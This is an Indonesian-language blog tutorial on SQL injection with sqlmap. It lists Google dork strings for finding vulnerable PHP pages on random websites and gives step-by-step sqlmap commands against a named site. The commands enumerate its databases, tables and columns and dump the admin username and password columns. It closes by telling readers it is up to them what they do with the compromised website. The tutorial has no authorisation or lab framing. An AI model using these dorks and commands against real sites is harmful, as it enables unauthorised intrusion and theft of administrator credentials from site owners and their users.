ok langsung saja, tidak perlu banyak basa-basi lagi
Cari target menggunakan google dorks
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
dan masih banyak lagi yang lainnya. Jika target sudah di temukan, buka sqlmap, lokasinya di:
Application – Backtrack – Exploitation Tools – Web Exploitation Tools – Sqlmap
Pentest target menggunakan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 –dbs
-u = url
–dbs = untuk mencari database
jika sudah menemukan databasenya, lanjut dengan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dedetampan –tables
-D = nama database yang kita temukan tadi
–tables = mencari nama tables
jika sudah menemukan nama tables, lanjut dengan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dedetampan -T admin –columns
-T = nama tables
–columns = mencari nama columns
jika sudah menemukan nama columns, lanjut dengan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dedetampan -T admin -C admin_username –dump
jika sudah mendapatkan nama username, lanjut dengan mencari password dari username tersebut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dedetampan -T admin -C admin_password –dump
nah kalau sudah begini, sekarang terserah kalian mau di buat apa website tersebut
Vidionya menyusul, berhubung durasinya lumayan lama, jadi malas upload ke youtube
Sumber : http://www.pedoelski.us/2011/10/sql-injection-with-sqlmap.html
